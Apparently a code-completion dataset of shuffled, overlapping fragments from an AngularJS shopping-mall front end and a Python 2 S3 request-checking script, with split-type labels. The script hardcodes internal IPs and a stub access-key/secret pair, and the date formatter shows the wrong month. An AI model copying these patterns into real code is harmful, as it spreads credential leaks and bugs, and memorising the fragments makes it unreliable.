$scope.orderList[i].orderTime=$scope.changeTime(date);
var status=$scope.orderList[i].status;
$scope.orderList[i].status=$scope.judgeStatus(status);
}
})
//转换日期格式
$scope.changeTime=function(date){
var year=date.getFullYear();
var mouth=date.getMonth();
mouth=mouth<10?("0"+mouth):mouth;
var day=date.getDate();
day=day<10?("0"+day):day;
var hour=date.getHours();
hour=hour<10?("0"+hour):hour;
var minues=date.getMinutes();
minues=minues<10?("0"+minues):minues;
var second=date.getSeconds();
second=second<10?("0"+second):second;
return year+'-'+mouth+'-'+day+'\n'+hour+":"+minues+":"+second;
}
//判断订单状态
$scope.judgeStatus=function(status){
switch(status){
case "1":
return "等待付款";
break;
case "2":
return "等待配货";
break;
case "3":
return "运输中";
break;
case "4":
return "已收货";
break;
}
}
}
}]);
function chose(obj){
$(obj).addClass("color-box-active").parent().siblings("label").children(".color-box-active").removeClass("color-box-active");
}
| identifier_name |
||
index.js | <=obj.pageCount;i++){
$rootScope.num.push(i);
$rootScope.isPageShow=true;
}
}else{
$rootScope.isPageShow=false;
if($rootScope.len<8){
$rootScope.searchMsg.pageNum++;
}
}
for (var i = 0; i < $rootScope.len; i++) {
var img=obj.data[i].img_sm;
obj.data[i].img_sm=img.slice(0,img.length-9)+"sm.jpg";
$rootScope.proList.push(obj.data[i]);
}
});
};
$rootScope.goToUserCenter=function(){
if($rootScope.userName){
$location.path('/mall_userCenter/1');
}else{
//TODO 弹出提示框;
alert("请登录");
}
}
}]);
//配置路由
app.config(function($routeProvider){
$routeProvider
.when("/APP_start",{
templateUrl:"tpl/APP_start.html"
})
.when("/mall_main",{
templateUrl:"tpl/mall_main.html",
controller:"mallMainCtrl"
})
.when("/mall_search/:id",{
templateUrl:"tpl/mall_search.html",
controller:"mallSearchCtrl"
})
.when("/mall_proList/:id",{
templateUrl:"tpl/mall_proList.html",
controller:"mallProListCtrl"
})
.when("/mall_proListbyteam/:id",{
templateUrl:"tpl/mall_proListbyteam.html",
controller:"mallProListByTeamCtrl"
})
.when("/mall_detail/:id",{
templateUrl:"tpl/mall_detail.html",
controller:"mallDetailCtrl"
})
.when("/mall_lottery",{
templateUrl:"tpl/mall_lottery.html",
controller:"mallLotteryCtrl"
})
.when("/mall_userCenter/:id",{
templateUrl:"tpl/mall_userCenter.html",
controller:"mallUserCenterCtrl"
})
.otherwise({redirectTo:"/APP_start"})
});
app.controller("mallMainCtrl",["$scope",function($scope){
}]);
app.controller("mallDetailCtrl",["$scope","$routeParams","$http","$rootScope",function($scope,$routeParams,$http,$rootScope){
//接收路由传递的参数,向服务器端请求商品详情
$scope.order={}
$http.get("data/7_showProductDetails.php?proId="+$routeParams.id).success(function(obj){
$scope.proDetail=obj;
$scope.order.count=1;
$scope.order.proId=$routeParams.id;
$scope.colorList=obj.colorList;
$scope.order.colorId=$scope.colorList[0].colorId;//颜色id;
$scope.photoList=$scope.colorList[0].photoList;//颜色对应的图片列表
$scope.sizeList=$scope.colorList[0].sizeList;//颜色对应的尺寸列表
$scope.Img={};
$scope.Img.s=$scope.colorList[0].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.order.sizeId=$scope.colorList[0].sizeList[0].sizeId;
//商品详情数组
$scope.pinfo=obj.pinfo.split("_");
$scope.$watch("Img.s",function(){
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
})
$scope.$watch("order.colorId",function(){
for(var i=0;i<$scope.colorList.length;i++){
if($scope.order.colorId==$scope.colorList[i].colorId){
$scope.photoList=$scope.colorList[i].photoList;
$scope.Img.s=$scope.colorList[i].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.sizeList=$scope.colorList[i].sizeList;
$scope.order.sizeId=$scope.colorList[i].sizeList[0].sizeId;
}
}
})
})
$scope.reduce=function(){
if($scope.order.count>1){
$scope.order.count--;
}
}
$scope.add=function(){
$scope.order.count++;
}
//加入购物车
$scope.addToCart=function(){
if($rootScope.userName){
$scope.order.uname=$rootScope.userName;
//发送请求提交数据
if($scope.order.proId!==undefined
&& $scope.order.count!==undefined
&& $scope.order.colorId!==undefined
&& $scope.order.sizeId!==undefined){
$http.post("data/8_cartAdd.php", $.param($scope.order)).success(function(txt){
if(txt=="ok"){
alert("商品添加购物车成功,您可以去到我的购物车进行结算")
}else{
alert("添加失败")
}
})
}
}else{
//TODO 弹出提示框,提醒用户登录
alert("您还未登录,请登录后在使用此功能")
}
}
}]);
app.controller("mallLotteryCtrl",["$scope",function($scope){
}]);
app.controller("mallSearchCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.kw=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/4_showProductByKw.php");
}]);
app.controller("mallProListCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.isPageShow=innerWidth>450?true:false;
$rootScope.searchMsg={};
$rootScope.searchMsg.pclass=$routeParams.id;
$rootScope.num=[];
$rootScope.proList=[];
$rootScope.loadMore(1,"data/5_showProductByPclass.php");
$scope.show=function(n){
$rootScope.loadMore(n+1,"data/5_showProductByPclass.php");
}
$scope.showNext=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.prev=function(){
$rootScope.searchMsg.pageNum--;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.add=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
}]);
app.controller("mallProListByTeamCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.team=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/6_showProductByTeam.php");
}]);
app.controller("mallUserCenterCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
if($routeParams.id==1){
$scope.isMyCart=true;
$scope.isMyOrder=false;
$http.get("data/9_cartShow.php?uname="+$rootScope.userName).success(function(data){
$scope.productList=data;
for(var i= 0,sum=0;i<$scope.productList.length;i++){
var total=($scope.productList[i].price*$scope.productList[i].count).toFixed(2);
$scope.productList[i].totalPrice=total;
sum+=Number(total);
}
$scope.total=sum;
})
$scope.removePro=function(did){
$scope.did=did;
$http.get("data/10_cartRemove.php?did="+did).success(function(txt){
if(txt=="ok"){
for(var i=0;i<$scope.productList.length;i++){
if($scope.productList[i].did==$scope.did){
$scope.total-=$scope.productList[i].totalPrice;
$scope.productList.splice(i,1);
break;
}
}
}else{
alert("删除失败了")
}
})
}
$scope.submitOrder=function(){
$scope.data={};
$scope.data.rcvId=1;
$scope.data.price=$scope.total;
$scope.data.payment=1;
$scope.data.uname=$rootScope.userName;
$scope.data.productList=JSON.stringify($scope.productList);
$http.post("data/11_addOrder.php", $.param($scope.data)).success(function(data){
if(data.msg=="succ"){
alert("订单提交成功,您的订单编号为"+data.orderNum+"; 您可以在我的订单中查看订单状态");
$scope.productList=[];
$scope.total=0;
}else{
alert("订单提交失败");
}
})
}
}else{
$scope.isMyCart=false;
$scope.isMyOrder=true;
$scope.orderList=null;
$http.get("data/12_showOrder.php?uname="+$rootScope.userName).success(function(data){
$scope.orderList=data;
for(var i=0;i<$scope.orderList.length;i++){
var date=new Date(Number($scope.orderList[i].orderTime)); | $scope.orderList[i].orderTime=$scope.changeTime(date);
var status=$scope.orderList[i].status;
$scope.orderList[i].status=$scope.judgeStatus(status);
}
}) | random_line_split |
|
checkData.py | tMarkerFromXML(xmlBody, markerStr):
marker = re.findall('<' + markerStr + '>(.+?)</' + markerStr + '>', xmlBody)
if marker and marker[0]:
logging.info('get marker in response %s' %marker[0])
return marker[0]
else:
logging.info('get no marker in response')
return None
#若calMd5为True,返回body MD5,否则返回响应body内容。
#若响应错误,返回空。
def make_request(s3Requesthandler,calMd5 = None, process=None):
global MD5_Global
myHTTPConnection = s3Requesthandler.myHTTPConnection
s3Request = s3Requesthandler.s3Request
returnData = None
#如果计算MD5则随机一个CHUNK_SIZE,否则固定CHUNK_SIZE大小。
if calMd5:
md5hashPart = 0; md5hashTotal = 0; fileHash = hashlib.md5();
checkData = False
CHUNK_SIZE = random.randint(4096,1048576)
logging.debug('CHUNK_SIZE: %d' %CHUNK_SIZE)
else: CHUNK_SIZE = 65536
peerAddr = myHTTPConnection.host; localAddr = ''
httpResponse = None
recvBody = ''
start_time = time.time()
end_time=0; status = '9999 '
try:
start_time = time.time()
myHTTPConnection.connection.putrequest(s3Request.method, s3Request.url, skip_host=1)
#发送HTTP头域
for k in s3Request.headers.keys():
myHTTPConnection.connection.putheader(k, s3Request.headers[k])
myHTTPConnection.connection.endheaders()
localAddr = str(myHTTPConnection.connection.sock._sock.getsockname())
peerAddr = str(myHTTPConnection.connection.sock._sock.getpeername())
logging.debug( 'Request:[%s], conn:[%s->%s], sendURL:[%s], sendHeaders:[%r], sendContent:[%s]' \
%(s3Request.requestType, localAddr, peerAddr, s3Request.url, s3Request.headers, s3Request.sendContent[0:1024]))
myHTTPConnection.connection.send(s3Request.sendContent)
waitResponseTimeStart = time.time()
#接收响应
httpResponse = myHTTPConnection.connection.getresponse(buffering=True)
waitResponseTime = time.time() - waitResponseTimeStart
logging.debug('get response, wait time %.3f' %waitResponseTime)
#读取响应体
contentLength = int(httpResponse.getheader('Content-Length', '-1'))
logging.debug('get ContentLength: %d' %contentLength)
#区分不同的请求,对于成功响应的GetObject请求,需要特殊处理,否则一次读完body内容。
#需要考虑range下载,返回2xx均为正常请求。
recvBytes = 0
if (httpResponse.status < 300) and s3Request.requestType in ('GetObject'):
#同时满足条件,才校验数据内容。
#1.打开calMd5开关。2.GetObject操作;3.正确返回200响应(206不计算)
while True:
datatmp = httpResponse.read(CHUNK_SIZE)
if not datatmp: break
recvBytes += len(datatmp)
if calMd5:
lastDatatmp = datatmp
fileHash.update(datatmp)
recvBody = '[receive content], length: %d' %recvBytes
if calMd5:
md5hashTotal = fileHash.hexdigest( )
returnData = md5hashTotal
else:
returnData = recvBody
else:
returnData = httpResponse.read()
recvBytes = len(returnData)
#要读完数据才算请求结束
end_time = time.time()
status = str(httpResponse.status) + ' ' + httpResponse.reason
#记日志、重定向(<400:debug; >=400,<500: warn; >=500:error)
if httpResponse.status < 400:
logging.debug('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
elif httpResponse.status < 500:
logging.warn('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url,waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
else:
logging.error('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime: [%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
if (httpResponse.status == 503):
flowControllMsg = 'Service unavailable, local data center is busy'
if recvBody.find(flowControllMsg) != -1: status = '503 Flow Control' #标记外部流控
requestID = httpResponse.getheader('x-amz-request-id', '9999999999999998')
#部分错误结果的头域中没有包含x-amz-request-id,则从recvBody中获取
if requestID == '9999999999999998' and httpResponse.status >= 300:
requestID = _getRequestIDFromBody_(recvBody)
if s3Request.method != 'HEAD' and contentLength != -1 and contentLength != recvBytes:
logging.error('data error. contentlength %d != dataRecvSize %d' %(contentLength, recvBytes))
raise Exception("Data Error Content-Length")
except KeyboardInterrupt:
if not status: status = '9991 KeyboardInterrupt'
except Exception, data:
returnData = None
import traceback
stack = traceback.format_exc()
logging.error('Caught exception:%s, Request:[%s], conn: [local:%s->peer:%s], URL:[%s], responseStatus:[%s], responseBody:[%r]' \
%(data, s3Request.requestType, localAddr, peerAddr, s3Request.url, status, recvBody[0:1024]))
logging.error('print stack: %s' %stack)
print 'ERROR: request %s/%s except: %s' %(s3Request.bucket, s3Request.key, stack)
finally:
if not end_time: end_time = time.time()
#关闭连接:1.按服务端语义,若connection:close,则关闭连接。
if httpResponse and (httpResponse.getheader('connection', '').lower() == 'close' or httpResponse.getheader('Connection', '').lower() == 'close'):
#关闭连接,让后续请求再新建连接。
logging.info('server inform to close connection')
myHTTPConnection.closeConnection()
#2.客户端感知的连接类错误,关闭连接。
elif not status <= '600':
logging.warning('caught exception, close connection')
#很可能是网络异常,关闭连接,让后续请求再新建连接。
myHTTPConnection.closeConnection()
time.sleep(.1)
#3.客户端配置了短连接
elif not myHTTPConnection.longConnection:
#python 2.7以下存在bug,不能直接使用close()方法关闭连接,不然客户端存在CLOSE_WAIT状态。
if myHTTPConnection.isSecure:
try:
import sys
if sys.version < '2.7':
import gc
gc.collect(0)
except: pass
else: myHTTPConnection.closeConnection()
if process: MD5_Global = returnData
return returnData
if __name__ == '__main__':
global MD5_Global_
printResult = time.time()
Service_1= '100.61.5.3'
Service_2 = '100.61.5.13'
#可以指定多个用户的AK,SK
User_AKSK = ['UDSIAMSTUBTEST000101,Udsiamstubtest000000UDSIAM | e.findall('<Key>(.+?)</Key>', xmlBody)
versions = re.findall('<VersionId>(.+?)</VersionId>', xmlBody)
for i in range(len(versions)):
if versions[i] == 'null': versions[i]=None
if len(versions)>0 and len(versions) != len(keys):
logging.error('response error, versions != keys %s' %xmlBody)
return []
if not len(versions): versions = [None for i in range(len(keys))]
return zip(keys,versions)
def ge | identifier_body |
|
checkData.py | , markerStr):
marker = re.findall('<' + markerStr + '>(.+?)</' + markerStr + '>', xmlBody)
if marker and marker[0]:
logging.info('get marker in response %s' %marker[0])
return marker[0]
else:
logging.info('get no marker in response')
return None
#若calMd5为True,返回body MD5,否则返回响应body内容。
#若响应错误,返回空。
def make_request(s3Requesthandler,calMd5 = None, process=None):
global MD5_Global
myHTTPConnection = s3Requesthandler.myHTTPConnection
s3Request = s3Requesthandler.s3Request
returnData = None
#如果计算MD5则随机一个CHUNK_SIZE,否则固定CHUNK_SIZE大小。
if calMd5:
md5hashPart = 0; md5hashTotal = 0; fileHash = hashlib.md5();
checkData = False
CHUNK_SIZE = random.randint(4096,1048576)
logging.debug('CHUNK_SIZE: %d' %CHUNK_SIZE)
else: CHUNK_SIZE = 65536
peerAddr = myHTTPConnection.host; localAddr = ''
httpResponse = None
recvBody = ''
start_time = time.time()
end_time=0; status = '9999 '
try:
start_time = time.time()
myHTTPConnection.connection.putrequest(s3Request.method, s3Request.url, skip_host=1)
#发送HTTP头域
for k in s3Request.headers.keys():
myHTTPConnection.connection.putheader(k, s3Request.headers[k])
myHTTPConnection.connection.endheaders()
localAddr = str(myHTTPConnection.connection.sock._sock.getsockname())
peerAddr = str(myHTTPConnection.connection.sock._sock.getpeername())
logging.debug( 'Request:[%s], conn:[%s->%s], sendURL:[%s], sendHeaders:[%r], sendContent:[%s]' \
%(s3Request.requestType, localAddr, peerAddr, s3Request.url, s3Request.headers, s3Request.sendContent[0:1024]))
myHTTPConnection.connection.send(s3Request.sendContent)
waitResponseTimeStart = time.time()
#接收响应
httpResponse = myHTTPConnection.connection.getresponse(buffering=True)
waitResponseTime = time.time() - waitResponseTimeStart
logging.debug('get response, wait time %.3f' %waitResponseTime)
#读取响应体
contentLength = int(httpResponse.getheader('Content-Length', '-1'))
logging.debug('get ContentLength: %d' %contentLength)
#区分不同的请求,对于成功响应的GetObject请求,需要特殊处理,否则一次读完body内容。
#需要考虑range下载,返回2xx均为正常请求。
recvBytes = 0
if (httpResponse.status < 300) and s3Request.requestType in ('GetObject'):
#同时满足条件,才校验数据内容。
#1.打开calMd5开关。2.GetObject操作;3.正确返回200响应(206不计算)
while True:
datatmp = httpResponse.read(CHUNK_SIZE)
if not datatmp: break
recvBytes += len(datatmp)
if calMd5:
lastDatatmp = datatmp
fileHash.update(datatmp)
recvBody = '[receive content], length: %d' %recvBytes
if calMd5:
md5hashTotal = fileHash.hexdigest( )
returnData = md5hashTotal
else:
returnData = recvBody
else:
returnData = httpResponse.read()
recvBytes = len(returnData)
#要读完数据才算请求结束
end_time = time.time()
status = str(httpResponse.status) + ' ' + httpResponse.reason
#记日志、重定向(<400:debug; >=400,<500: warn; >=500:error)
if httpResponse.status < 400:
logging.debug('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
elif httpResponse.status < 500:
logging.warn('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url,waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
else:
logging.error('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime: [%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
if (httpResponse.status == 503):
flowControllMsg = 'Service unavailable, local data center is busy'
if recvBody.find(flowControllMsg) != -1: status = '503 Flow Control' #标记外部流控
requestID = httpResponse.getheader('x-amz-request-id', '9999999999999998')
#部分错误结果的头域中没有包含x-amz-request-id,则从recvBody中获取
if requestID == '9999999999999998' and httpResponse.status >= 300:
requestID = _getRequestIDFromBody_(recvBody)
if s3Request.method != 'HEAD' and contentLength != -1 and contentLength != recvBytes:
logging.error('data error. contentlength %d != dataRecvSize %d' %(contentLength, recvBytes))
raise Exception("Data Error Content-Length")
except KeyboardInterrupt:
if not status: status = '9991 KeyboardInterrupt'
except Exception, data:
returnData = None
import traceback
stack = traceback.format_exc()
logging.error('Caught exception:%s, Request:[%s], conn: [local:%s->peer:%s], URL:[%s], responseStatus:[%s], responseBody:[%r]' \
%(data, s3Request.requestType, localAddr, peerAddr, s3Request.url, status, recvBody[0:1024]))
logging.error('print stack: %s' %stack)
print 'ERROR: request %s/%s except: %s' %(s3Request.bucket, s3Request.key, stack)
finally:
if not end_time: end_time = time.time()
#关闭连接:1.按服务端语义,若connection:close,则关闭连接。
if httpResponse and (httpResponse.getheader('connection', '').lower() == 'close' or httpResponse.getheader('Connection', '').lower() == 'close'):
#关闭连接,让后续请求再新建连接。
logging.info('server inform to close connection')
myHTTPConnection.closeConnection()
#2.客户端感知的连接类错误,关闭连接。
elif not status <= '600':
logging.warning('caught exception, close connection')
#很可能是网络异常,关闭连接,让后续请求再新建连接。
myHTTPConnection.closeConnection()
time.sleep(.1)
#3.客户端配置了短连接
elif not myHTTPConnection.longConnection:
#python 2.7以下存在bug,不能直接使用close()方法关闭连接,不然客户端存在CLOSE_WAIT状态。
if myHTTPConnection.isSecure:
try:
import sys
if sys.version < '2.7':
import gc
gc.collect(0)
except: pass
else: myHTTPConnection.closeConnection()
if process: MD5_Global = returnData
return returnData
if __name__ == '__main__':
global MD5_Global_
printResult = time.time()
Service_1= '100.61.5.3'
Service_2 = '100.61.5.13'
#可以指定多个用户的AK,SK
User_AKSK = ['UDSIAMSTUBTEST000101,Udsiamstubtest000000UDSIAMSTUBTEST000101',]
#server = '127.0.0.1', isSecure = False, timeout=80, serialNo = None, longConnection = False
server1_conn = s3PyCmd.MyHTTPConnection(host=Service_1, isSecure=False, timeout=600, serialNo=0, longConnection=False)
server2_conn = s3PyCmd.MyHTTPConnection(host=Service_2, isSecure=False, timeout=600, serialNo=0, longConnection | rFromXML(xmlBody | identifier_name |
|
checkData.py | if not len(versions): versions = [None for i in range(len(keys))]
return zip(keys,versions)
def getMarkerFromXML(xmlBody, markerStr):
marker = re.findall('<' + markerStr + '>(.+?)</' + markerStr + '>', xmlBody)
if marker and marker[0]:
logging.info('get marker in response %s' %marker[0])
return marker[0]
else:
logging.info('get no marker in response')
return None
#若calMd5为True,返回body MD5,否则返回响应body内容。
#若响应错误,返回空。
def make_request(s3Requesthandler,calMd5 = None, process=None):
global MD5_Global
myHTTPConnection = s3Requesthandler.myHTTPConnection
s3Request = s3Requesthandler.s3Request
returnData = None
#如果计算MD5则随机一个CHUNK_SIZE,否则固定CHUNK_SIZE大小。
if calMd5:
md5hashPart = 0; md5hashTotal = 0; fileHash = hashlib.md5();
checkData = False
CHUNK_SIZE = random.randint(4096,1048576)
logging.debug('CHUNK_SIZE: %d' %CHUNK_SIZE)
else: CHUNK_SIZE = 65536
peerAddr = myHTTPConnection.host; localAddr = ''
httpResponse = None
recvBody = ''
start_time = time.time()
end_time=0; status = '9999 '
try:
start_time = time.time()
myHTTPConnection.connection.putrequest(s3Request.method, s3Request.url, skip_host=1)
#发送HTTP头域
for k in s3Request.headers.keys():
myHTTPConnection.connection.putheader(k, s3Request.headers[k])
myHTTPConnection.connection.endheaders()
localAddr = str(myHTTPConnection.connection.sock._sock.getsockname())
peerAddr = str(myHTTPConnection.connection.sock._sock.getpeername())
logging.debug( 'Request:[%s], conn:[%s->%s], sendURL:[%s], sendHeaders:[%r], sendContent:[%s]' \
%(s3Request.requestType, localAddr, peerAddr, s3Request.url, s3Request.headers, s3Request.sendContent[0:1024]))
myHTTPConnection.connection.send(s3Request.sendContent)
waitResponseTimeStart = time.time()
#接收响应
httpResponse = myHTTPConnection.connection.getresponse(buffering=True)
waitResponseTime = time.time() - waitResponseTimeStart
logging.debug('get response, wait time %.3f' %waitResponseTime)
#读取响应体
contentLength = int(httpResponse.getheader('Content-Length', '-1'))
logging.debug('get ContentLength: %d' %contentLength)
#区分不同的请求,对于成功响应的GetObject请求,需要特殊处理,否则一次读完body内容。
#需要考虑range下载,返回2xx均为正常请求。
recvBytes = 0
if (httpResponse.status < 300) and s3Request.requestType in ('GetObject'):
#同时满足条件,才校验数据内容。
#1.打开calMd5开关。2.GetObject操作;3.正确返回200响应(206不计算)
while True:
datatmp = httpResponse.read(CHUNK_SIZE)
if not datatmp: break
recvBytes += len(datatmp)
if calMd5:
lastDatatmp = datatmp
fileHash.update(datatmp)
recvBody = '[receive content], length: %d' %recvBytes
if calMd5:
md5hashTotal = fileHash.hexdigest( )
returnData = md5hashTotal
else:
returnData = recvBody
else:
returnData = httpResponse.read()
recvBytes = len(returnData)
#要读完数据才算请求结束
end_time = time.time()
status = str(httpResponse.status) + ' ' + httpResponse.reason
#记日志、重定向(<400:debug; >=400,<500: warn; >=500:error)
if httpResponse.status < 400:
logging.debug('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
elif httpResponse.status < 500:
logging.warn('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url,waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
else:
logging.error('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime: [%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
if (httpResponse.status == 503):
flowControllMsg = 'Service unavailable, local data center is busy'
if recvBody.find(flowControllMsg) != -1: status = '503 Flow Control' #标记外部流控
requestID = httpResponse.getheader('x-amz-request-id', '9999999999999998')
#部分错误结果的头域中没有包含x-amz-request-id,则从recvBody中获取
if requestID == '9999999999999998' and httpResponse.status >= 300:
requestID = _getRequestIDFromBody_(recvBody)
if s3Request.method != 'HEAD' and contentLength != -1 and contentLength != recvBytes:
logging.error('data error. contentlength %d != dataRecvSize %d' %(contentLength, recvBytes))
raise Exception("Data Error Content-Length")
except KeyboardInterrupt:
if not status: status = '9991 KeyboardInterrupt'
except Exception, data:
returnData = None
import traceback
stack = traceback.format_exc()
logging.error('Caught exception:%s, Request:[%s], conn: [local:%s->peer:%s], URL:[%s], responseStatus:[%s], responseBody:[%r]' \
%(data, s3Request.requestType, localAddr, peerAddr, s3Request.url, status, recvBody[0:1024]))
logging.error('print stack: %s' %stack)
print 'ERROR: request %s/%s except: %s' %(s3Request.bucket, s3Request.key, stack)
finally:
if not end_time: end_time = time.time()
#关闭连接:1.按服务端语义,若connection:close,则关闭连接。
if httpResponse and (httpResponse.getheader('connection', '').lower() == 'close' or httpResponse.getheader('Connection', '').lower() == 'close'):
#关闭连接,让后续请求再新建连接。
logging.info('server inform to close connection')
myHTTPConnection.closeConnection()
#2.客户端感知的连接类错误,关闭连接。
elif not status <= '600':
logging.warning('caught exception, close connection')
#很可能是网络异常,关闭连接,让后续请求再新建连接。
myHTTPConnection.closeConnection()
time.sleep(.1)
#3.客户端配置了短连接
elif not myHTTPConnection.longConnection:
#python 2.7以下存在bug,不能直接使用close()方法关闭连接,不然客户端存在CLOSE_WAIT状态。
if myHTTPConnection.isSecure:
try:
import sys
if sys.version < '2.7':
import gc
gc.collect(0)
except: pass
else: myHTTPConnection.closeConnection()
if process: MD5_Global = returnData
return returnData
if __name__ == '__main__':
global MD5_Global_
printResult = time.time()
Service_1= '100.61.5.3'
Service_2 = '100.61.5.13'
#可以指定多个用户的AK,SK
User_AKSK = ['UDSIAMSTUBTEST000101,Udsiamstubtest000000UDSIAMSTUBTEST000101',]
#server = '127.0.0.1', isSecure = False, timeout=80, serialNo = None, longConnection = False
server1_conn = s3PyCmd | if len(versions)>0 and len(versions) != len(keys):
logging.error('response error, versions != keys %s' %xmlBody)
return [] | random_line_split |
|
checkData.py | HTTPConnection.connection.endheaders()
localAddr = str(myHTTPConnection.connection.sock._sock.getsockname())
peerAddr = str(myHTTPConnection.connection.sock._sock.getpeername())
logging.debug( 'Request:[%s], conn:[%s->%s], sendURL:[%s], sendHeaders:[%r], sendContent:[%s]' \
%(s3Request.requestType, localAddr, peerAddr, s3Request.url, s3Request.headers, s3Request.sendContent[0:1024]))
myHTTPConnection.connection.send(s3Request.sendContent)
waitResponseTimeStart = time.time()
#接收响应
httpResponse = myHTTPConnection.connection.getresponse(buffering=True)
waitResponseTime = time.time() - waitResponseTimeStart
logging.debug('get response, wait time %.3f' %waitResponseTime)
#读取响应体
contentLength = int(httpResponse.getheader('Content-Length', '-1'))
logging.debug('get ContentLength: %d' %contentLength)
#区分不同的请求,对于成功响应的GetObject请求,需要特殊处理,否则一次读完body内容。
#需要考虑range下载,返回2xx均为正常请求。
recvBytes = 0
if (httpResponse.status < 300) and s3Request.requestType in ('GetObject'):
#同时满足条件,才校验数据内容。
#1.打开calMd5开关。2.GetObject操作;3.正确返回200响应(206不计算)
while True:
datatmp = httpResponse.read(CHUNK_SIZE)
if not datatmp: break
recvBytes += len(datatmp)
if calMd5:
lastDatatmp = datatmp
fileHash.update(datatmp)
recvBody = '[receive content], length: %d' %recvBytes
if calMd5:
md5hashTotal = fileHash.hexdigest( )
returnData = md5hashTotal
else:
returnData = recvBody
else:
returnData = httpResponse.read()
recvBytes = len(returnData)
#要读完数据才算请求结束
end_time = time.time()
status = str(httpResponse.status) + ' ' + httpResponse.rea | #记日志、重定向(<400:debug; >=400,<500: warn; >=500:error)
if httpResponse.status < 400:
logging.debug('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
elif httpResponse.status < 500:
logging.warn('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url,waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
else:
logging.error('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime: [%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
if (httpResponse.status == 503):
flowControllMsg = 'Service unavailable, local data center is busy'
if recvBody.find(flowControllMsg) != -1: status = '503 Flow Control' #标记外部流控
requestID = httpResponse.getheader('x-amz-request-id', '9999999999999998')
#部分错误结果的头域中没有包含x-amz-request-id,则从recvBody中获取
if requestID == '9999999999999998' and httpResponse.status >= 300:
requestID = _getRequestIDFromBody_(recvBody)
if s3Request.method != 'HEAD' and contentLength != -1 and contentLength != recvBytes:
logging.error('data error. contentlength %d != dataRecvSize %d' %(contentLength, recvBytes))
raise Exception("Data Error Content-Length")
except KeyboardInterrupt:
if not status: status = '9991 KeyboardInterrupt'
except Exception, data:
returnData = None
import traceback
stack = traceback.format_exc()
logging.error('Caught exception:%s, Request:[%s], conn: [local:%s->peer:%s], URL:[%s], responseStatus:[%s], responseBody:[%r]' \
%(data, s3Request.requestType, localAddr, peerAddr, s3Request.url, status, recvBody[0:1024]))
logging.error('print stack: %s' %stack)
print 'ERROR: request %s/%s except: %s' %(s3Request.bucket, s3Request.key, stack)
finally:
if not end_time: end_time = time.time()
#关闭连接:1.按服务端语义,若connection:close,则关闭连接。
if httpResponse and (httpResponse.getheader('connection', '').lower() == 'close' or httpResponse.getheader('Connection', '').lower() == 'close'):
#关闭连接,让后续请求再新建连接。
logging.info('server inform to close connection')
myHTTPConnection.closeConnection()
#2.客户端感知的连接类错误,关闭连接。
elif not status <= '600':
logging.warning('caught exception, close connection')
